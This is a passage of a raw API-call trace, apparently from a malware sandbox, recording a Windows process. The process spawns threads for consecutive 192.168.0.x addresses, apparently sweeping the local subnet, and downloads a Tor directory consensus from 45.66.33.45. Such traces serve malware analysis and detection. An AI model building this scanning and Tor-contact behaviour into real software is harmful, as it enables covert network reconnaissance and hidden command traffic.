RtlInitializeConditionVariable (in: ConditionVariable=0x42be60 | out: ConditionVariable=0x42be60) [0197.736] GetCurrentThreadId () returned 0x116c [0197.736] GetCurrentThreadId () returned 0x116c [0197.736] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x14) returned 0x438818 [0197.737] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x32591f, phModule=0x438824 | out: phModule=0x438824*=0x320000) returned 1 [0197.737] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x358a98, lpParameter=0x438818, dwCreationFlags=0x0, lpThreadId=0xdcf82c | out: lpThreadId=0xdcf82c*=0xf3c) returned 0x5cc [0197.738] SleepConditionVariableSRW (in: ConditionVariable=0x43ceac, SRWLock=0x42be60, dwMilliseconds=0xffffffff, Flags=0x0 | out: ConditionVariable=0x43ceac, SRWLock=0x42be60) returned 1 [0197.852] GetCurrentThreadId () returned 0x116c [0197.852] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42be58 | out: hHeap=0x3c0000) returned 1 [0197.852] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cea8 | out: hHeap=0x3c0000) returned 1 [0197.852] CloseHandle (hObject=0x5cc) returned 1 [0197.852] GetCurrentThreadId () returned 0x116c [0197.852] GetCurrentThreadId () returned 0x116c [0197.852] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x438838 | out: hHeap=0x3c0000) returned 1 [0197.852] inet_ntoa (in=0x100a8c0) returned="192.168.0.1" [0197.852] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x18) returned 0x438a58 [0197.852] GetCurrentThreadId () returned 0x116c [0197.852] GetCurrentThreadId () returned 0x116c [0197.852] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x24) returned 0x43d268 [0197.853] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x28) returned 0x43d2f8 [0197.853] RtlInitializeConditionVariable (in: ConditionVariable=0x43d2fc | out: ConditionVariable=0x43d2fc) [0197.853] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x30) returned 0x42bb80 [0197.853] RtlInitializeConditionVariable (in: ConditionVariable=0x42bb88 | out: ConditionVariable=0x42bb88) [0197.853] GetCurrentThreadId () returned 0x116c [0197.853] GetCurrentThreadId () returned 0x116c [0197.853] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x14) returned 0x438ad8 [0197.853] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x32591f, phModule=0x438ae4 | out: phModule=0x438ae4*=0x320000) returned 1 [0197.853] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x358a98, lpParameter=0x438ad8, dwCreationFlags=0x0, lpThreadId=0xdcf82c | out: lpThreadId=0xdcf82c*=0xf34) returned 0x5cc [0197.854] SleepConditionVariableSRW (in: ConditionVariable=0x43d2fc, SRWLock=0x42bb88, dwMilliseconds=0xffffffff, Flags=0x0 | out: ConditionVariable=0x43d2fc, SRWLock=0x42bb88) returned 1 [0197.984] GetCurrentThreadId () returned 0x116c [0197.984] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bb80 | out: hHeap=0x3c0000) returned 1 [0197.984] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43d2f8 | out: hHeap=0x3c0000) returned 1 [0197.984] CloseHandle (hObject=0x5cc) returned 1 [0197.984] GetCurrentThreadId () returned 0x116c [0197.984] GetCurrentThreadId () returned 0x116c [0197.984] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x438a58 | out: hHeap=0x3c0000) returned 1 [0197.985] inet_ntoa (in=0x200a8c0) returned="192.168.0.2" [0197.985] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x18) returned 0x438858 [0197.985] GetCurrentThreadId () returned 0x116c [0197.985] GetCurrentThreadId () returned 0x116c [0197.985] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x24) returned 0x43d028 [0197.985] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x28) returned 0x43ce48 [0197.985] RtlInitializeConditionVariable (in: ConditionVariable=0x43ce4c | out: ConditionVariable=0x43ce4c) [0197.985] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x30) returned 0x42b9f8 [0197.985] RtlInitializeConditionVariable (in: ConditionVariable=0x42ba00 | out: ConditionVariable=0x42ba00) [0197.985] GetCurrentThreadId () returned 0x116c [0197.985] GetCurrentThreadId () returned 0x116c [0197.985] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x14) returned 0x4387f8 [0197.985] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x32591f, phModule=0x438804 | out: phModule=0x438804*=0x320000) returned 1 [0197.985] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x358a98, lpParameter=0x4387f8, dwCreationFlags=0x0, lpThreadId=0xdcf82c | out: lpThreadId=0xdcf82c*=0xdb0) returned 0x5cc [0197.986] SleepConditionVariableSRW (in: ConditionVariable=0x43ce4c, SRWLock=0x42ba00, dwMilliseconds=0xffffffff, Flags=0x0 | out: ConditionVariable=0x43ce4c, SRWLock=0x42ba00) returned 1 [0198.062] GetCurrentThreadId () returned 0x116c [0198.063] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b9f8 | out: hHeap=0x3c0000) returned 1 [0198.063] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43ce48 | out: hHeap=0x3c0000) returned 1 [0198.063] CloseHandle (hObject=0x5cc) returned 1 [0198.063] GetCurrentThreadId () returned 0x116c [0198.063] GetCurrentThreadId () returned 0x116c [0198.063] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x438858 | out: hHeap=0x3c0000) returned 1 [0198.063] inet_ntoa (in=0x300a8c0) returned="192.168.0.3" [0198.063] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x18) returned 0x438b98 [0198.063] GetCurrentThreadId () returned 0x116c [0198.063] GetCurrentThreadId () returned 0x116c [0198.063] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x24) returned 0x43d2c8 [0198.063] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x28) returned 0x43cfc8 [0198.063] RtlInitializeConditionVariable (in: ConditionVariable=0x43cfcc | out: ConditionVariable=0x43cfcc) [0198.063] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x30) returned 0x42bbf0 [0198.063] RtlInitializeConditionVariable (in: ConditionVariable=0x42bbf8 | out: ConditionVariable=0x42bbf8) [0198.063] GetCurrentThreadId () returned 0x116c [0198.063] GetCurrentThreadId () returned 0x116c [0198.063] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x14) returned 0x438b18 [0198.064] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x32591f, phModule=0x438b24 | out: phModule=0x438b24*=0x320000) returned 1 [0198.064] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x358a98, lpParameter=0x438b18, dwCreationFlags=0x0, lpThreadId=0xdcf82c | out: lpThreadId=0xdcf82c*=0x12f4) returned 0x5cc [0198.065] SleepConditionVariableSRW (in: ConditionVariable=0x43cfcc, SRWLock=0x42bbf8, dwMilliseconds=0xffffffff, Flags=0x0 | out: ConditionVariable=0x43cfcc, SRWLock=0x42bbf8) returned 1 [0198.143] GetCurrentThreadId () returned 0x116c [0198.144] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bbf0 | out: hHeap=0x3c0000) returned 1 [0198.144] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cfc8 | out: hHeap=0x3c0000) returned 1 [0198.144] CloseHandle (hObject=0x5cc) returned 1 [0198.144] GetCurrentThreadId () returned 0x116c [0198.144] GetCurrentThreadId () returned 0x116c [0198.144] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x438b98 | out: hHeap=0x3c0000) returned 1 [0198.144] inet_ntoa (in=0x400a8c0) returned="192.168.0.4" [0198.144] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x18) returned 0x438a58 [0198.144] GetCurrentThreadId () returned 0x116c [0198.144] GetCurrentThreadId () returned 0x116c [0198.144] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x24) returned 0x43cfc8 [0198.144] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x28) returned 0x43d1d8 [0198.144] RtlInitializeConditionVariable (in: ConditionVariable=0x43d1dc | out: ConditionVariable=0x43d1dc) [0198.144] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x30) returned 0x42bcd0 [0198.144] RtlInitializeConditionVariable (in: ConditionVariable=0x42bcd8 | out: ConditionVariable=0x42bcd8) [0198.144] GetCurrentThreadId () returned 0x116c [0198.144] GetCurrentThreadId () returned 0x116c [0198.144] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x14) returned 0x438898 [0198.145] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x32591f, phModule=0x4388a4 | out: phModule=0x4388a4*=0x320000) returned 1 [0198.145] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x358a98, lpParameter=0x438898, dwCreationFlags=0x0, lpThreadId=0xdcf82c | out: lpThreadId=0xdcf82c*=0xf60) returned 0x5cc [0198.146] SleepConditionVariableSRW (in: ConditionVariable=0x43d1dc, SRWLock=0x42bcd8, dwMilliseconds=0xffffffff, Flags=0x0 | out: ConditionVariable=0x43d1dc, SRWLock=0x42bcd8) returned 1 [0198.244] GetCurrentThreadId () returned 0x116c [0198.244] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bcd0 | out: hHeap=0x3c0000) returned 1 [0198.244] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43d1d8 | out: hHeap=0x3c0000) returned 1 [0198.244] CloseHandle (hObject=0x5cc) returned 1 [0198.244] GetCurrentThreadId () returned 0x116c [0198.244] GetCurrentThreadId () returned 0x116c [0198.244] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x438a58 | out: hHeap=0x3c0000) returned 1 [0198.244] inet_ntoa (in=0x500a8c0) returned="192.168.0.5" [0198.244] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x18) returned 0x438978 [0198.244] GetCurrentThreadId () returned 0x116c [0198.244] GetCurrentThreadId () returned 0x116c [0198.244] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x24) returned 0x43d1d8 [0198.245] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x28) returned 0x43cea8 [0198.245] RtlInitializeConditionVariable (in: ConditionVariable=0x43ceac | out: ConditionVariable=0x43ceac) [0198.245] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x30) returned 0x42bad8 [0198.245] RtlInitializeConditionVariable (in: ConditionVariable=0x42bae0 | out: ConditionVariable=0x42bae0) [0198.245] GetCurrentThreadId () returned 0x116c [0198.245] GetCurrentThreadId () returned 0x116c [0198.245] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x14) returned 0x438a58 [0198.245] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x32591f, phModule=0x438a64 | out: phModule=0x438a64*=0x320000) returned 1 [0198.245] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x358a98, lpParameter=0x438a58, dwCreationFlags=0x0, lpThreadId=0xdcf82c | out: lpThreadId=0xdcf82c*=0xf58) returned 0x5cc [0198.246] SleepConditionVariableSRW (in: ConditionVariable=0x43ceac, SRWLock=0x42bae0, dwMilliseconds=0xffffffff, Flags=0x0 | out: ConditionVariable=0x43ceac, SRWLock=0x42bae0) returned 1 [0198.330] GetCurrentThreadId () returned 0x116c [0198.330] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bad8 | out: hHeap=0x3c0000) returned 1 [0198.330] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cea8 | out: hHeap=0x3c0000) returned 1 [0198.330] CloseHandle (hObject=0x5cc) returned 1 [0198.330] GetCurrentThreadId () returned 0x116c [0198.331] GetCurrentThreadId () returned 0x116c [0198.331] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x438978 | out: hHeap=0x3c0000) returned 1 [0198.331] inet_ntoa (in=0x600a8c0) returned="192.168.0.6" [0198.331] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x18) returned 0x438b98 [0198.331] GetCurrentThreadId () returned 0x116c [0198.331] GetCurrentThreadId () returned 0x116c [0198.331] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x24) returned 0x43ce78 [0198.331] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x28) returned 0x43d2f8 [0198.331] RtlInitializeConditionVariable (in: ConditionVariable=0x43d2fc | out: ConditionVariable=0x43d2fc) [0198.331] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x30) returned 0x42bad8 [0198.331] RtlInitializeConditionVariable (in: ConditionVariable=0x42bae0 | out: ConditionVariable=0x42bae0) [0198.331] GetCurrentThreadId () returned 0x116c [0198.332] GetCurrentThreadId () returned 0x116c [0198.332] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x14) returned 0x438978 [0198.332] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x32591f, phModule=0x438984 | out: phModule=0x438984*=0x320000) returned 1 [0198.333] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x358a98, lpParameter=0x438978, dwCreationFlags=0x0, lpThreadId=0xdcf82c | out: lpThreadId=0xdcf82c*=0xf6c) returned 0x5cc [0198.334] SleepConditionVariableSRW (in: ConditionVariable=0x43d2fc, SRWLock=0x42bae0, dwMilliseconds=0xffffffff, Flags=0x0 | out: ConditionVariable=0x43d2fc, SRWLock=0x42bae0) returned 1 [0198.415] GetCurrentThreadId () returned 0x116c [0198.415] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bad8 | out: hHeap=0x3c0000) returned 1 [0198.415] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43d2f8 | out: hHeap=0x3c0000) returned 1 [0198.415] CloseHandle (hObject=0x5cc) returned 1 [0198.415] GetCurrentThreadId () returned 0x116c [0198.415] GetCurrentThreadId () returned 0x116c [0198.415] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x438b98 | out: hHeap=0x3c0000) returned 1 [0198.415] inet_ntoa (in=0x700a8c0) returned="192.168.0.7" [0198.415] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x18) returned 0x438a78 [0198.415] GetCurrentThreadId () returned 0x116c [0198.415] GetCurrentThreadId () returned 0x116c [0198.415] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x24) returned 0x43cdb8 [0198.415] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x28) returned 0x43cff8 [0198.415] RtlInitializeConditionVariable (in: ConditionVariable=0x43cffc | out: ConditionVariable=0x43cffc) [0198.415] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x30) returned 0x42bad8 [0198.415] RtlInitializeConditionVariable (in: ConditionVariable=0x42bae0 | out: ConditionVariable=0x42bae0) [0198.415] GetCurrentThreadId () returned 0x116c [0198.415] GetCurrentThreadId () returned 0x116c [0198.415] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x14) returned 0x438a98 [0198.416] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x32591f, phModule=0x438aa4 | out: phModule=0x438aa4*=0x320000) returned 1 [0198.416] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x358a98, lpParameter=0x438a98, dwCreationFlags=0x0, lpThreadId=0xdcf82c | out: lpThreadId=0xdcf82c*=0xea0) returned 0x5cc [0198.416] SleepConditionVariableSRW (in: ConditionVariable=0x43cffc, SRWLock=0x42bae0, dwMilliseconds=0xffffffff, Flags=0x0 | out: ConditionVariable=0x43cffc, SRWLock=0x42bae0) returned 1 [0198.541] GetCurrentThreadId () returned 0x116c [0198.541] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bad8 | out: hHeap=0x3c0000) returned 1 [0198.541] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cff8 | out: hHeap=0x3c0000) returned 1 [0198.541] CloseHandle (hObject=0x5cc) returned 1 [0198.541] GetCurrentThreadId () returned 0x116c [0198.541] GetCurrentThreadId () returned 0x116c [0198.541] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x438a78 | out: hHeap=0x3c0000) returned 1 [0198.542] inet_ntoa (in=0x800a8c0) returned="192.168.0.8" [0198.542] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x18) returned 0x438878 [0198.542] GetCurrentThreadId () returned 0x116c [0198.542] GetCurrentThreadId () returned 0x116c [0198.542] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x24) returned 0x43ced8 [0198.542] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x28) returned 0x43d0e8 [0198.542] RtlInitializeConditionVariable (in: ConditionVariable=0x43d0ec | out: ConditionVariable=0x43d0ec) [0198.542] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x30) returned 0x42bad8 [0198.542] RtlInitializeConditionVariable (in: ConditionVariable=0x42bae0 | out: ConditionVariable=0x42bae0) [0198.542] GetCurrentThreadId () returned 0x116c [0198.542] GetCurrentThreadId () returned 0x116c [0198.542] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x14) returned 0x438838 [0198.543] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x32591f, phModule=0x438844 | out: phModule=0x438844*=0x320000) returned 1 [0198.543] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x358a98, lpParameter=0x438838, dwCreationFlags=0x0, lpThreadId=0xdcf82c | out: lpThreadId=0xdcf82c*=0x4fc) returned 0x5cc [0198.543] SleepConditionVariableSRW (ConditionVariable=0x43d0ec, SRWLock=0x42bae0, dwMilliseconds=0xffffffff, Flags=0x0) Thread: id = 2 os_tid = 0x1168 Thread: id = 3 os_tid = 0x1164 Thread: id = 4 os_tid = 0x348 Thread: id = 5 os_tid = 0xf14 Thread: id = 6 os_tid = 0xef0 Thread: id = 7 os_tid = 0x11cc Thread: id = 8 os_tid = 0x11b8 Thread: id = 9 os_tid = 0x704 Thread: id = 36 os_tid = 0xbd8 [0113.290] GetLastError () returned 0x0 [0113.290] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x364) returned 0x435f20 [0113.290] SetLastError (dwErrCode=0x0) [0113.290] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x773a0000 [0113.291] GetProcAddress (hModule=0x773a0000, lpProcName="GetCurrentPackageId") returned 0x773a3510 [0113.291] GetCurrentPackageId () returned 0x3d54 [0113.291] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x3fa038 [0113.291] malloc (_Size=0x84) returned 0x6004a0 [0113.293] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x4, pbBuffer=0x339fbc4 | out: pbBuffer=0x339fbc4) returned 1 [0113.293] inet_ntoa (in=0x2d21422d) returned="45.66.33.45" [0113.596] malloc (_Size=0xc) returned 0x605aa0 [0113.596] free (_Block=0x0) [0113.597] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x7419a1b0 | out: lpWSAData=0x7419a1b0) returned 0 [0113.600] atexit (param_1=0x74193a63) returned 0 [0113.600] gethostbyname (name="45.66.33.45") returned 0x42b640*(h_name="45.66.33.45", h_aliases=0x42b650*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x42b654*=([0]="45.66.33.45")) [0116.432] htons (hostshort=0x50) returned 0x5000 [0116.432] socket (af=2, type=1, protocol=6) returned 0x558 [0116.444] connect (s=0x558, name=0x339fb50*(sa_family=2, sin_port=0x50, sin_addr="45.66.33.45"), namelen=16) returned 0 [0116.471] _vscprintf (_Format="GET %s HTTP/1.0\r\nHost: %s\r\n\r\n", _ArgList=0x339fb18) returned 70 [0116.471] malloc (_Size=0x47) returned 0x6066d8 [0116.471] free (_Block=0x0) [0116.472] vsprintf_s (in: _DstBuf=0x6066d8, _SizeInBytes=0x47, _Format="GET %s HTTP/1.0\r\nHost: %s\r\n\r\n", _ArgList=0x339fb18 | out: _DstBuf="GET /tor/status-vote/current/consensus HTTP/1.0\r\nHost: 45.66.33.45\r\n\r\n") returned 70 [0116.472] send (s=0x558, buf=0x6066d8*, len=71, flags=0) returned 71 [0116.473] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 2000 [0116.570] malloc (_Size=0x7d1) returned 0x60ada8 [0116.575] free (_Block=0x0) [0116.575] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.576] malloc (_Size=0x17d1) returned 0x60b588 [0116.576] free (_Block=0x60ada8) [0116.576] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.576] malloc (_Size=0x27d1) returned 0x33a0048 [0116.581] free (_Block=0x60b588) [0116.581] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.581] malloc (_Size=0x3bb9) returned 0x60ada8 [0116.581] free (_Block=0x33a0048) [0116.581] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.581] malloc (_Size=0x53b9) returned 0x33a0048 [0116.583] free (_Block=0x60ada8) [0116.583] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.583] malloc (_Size=0x6bb9) returned 0x33a5410 [0116.584] free (_Block=0x33a0048) [0116.584] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.584] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.584] malloc (_Size=0x9bb9) returned 0x33abfd8 [0116.587] free (_Block=0x33a5410) [0116.588] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.590] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.590] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.590] malloc (_Size=0xe3b9) returned 0x33b5ba0 [0116.596] free (_Block=0x33abfd8) [0116.597] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.597] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.599] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.600] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.600] malloc (_Size=0x143b9) returned 0x33a0048 [0116.601] free (_Block=0x33b5ba0) [0116.601] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.601] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.602] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.602] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.602] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.602] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.602] malloc (_Size=0x1d3b9) returned 0x33b4410 [0116.604] free (_Block=0x33a0048) [0116.604] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.604] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.604] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.604] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.605] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.605] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.605] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.605] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.605] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.605] malloc (_Size=0x2abb9) returned 0x33d17d8 [0116.608] free (_Block=0x33b4410) [0116.608] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.609] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.609] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.609] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.609] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.610] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.610] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.610] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.610] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.610] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.611] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.611] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.611] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.611] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.611] malloc (_Size=0x3fbb9) returned 0x33fc3a0 [0116.615] free (_Block=0x33d17d8) [0116.615] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.615] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.616] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.619] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.619] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.620] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.620] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.620] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.620] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.621] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.621] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.621] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.621] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.621] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.622] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.622] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.622] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.622] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.622] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.622] recv (in: s=0x558, 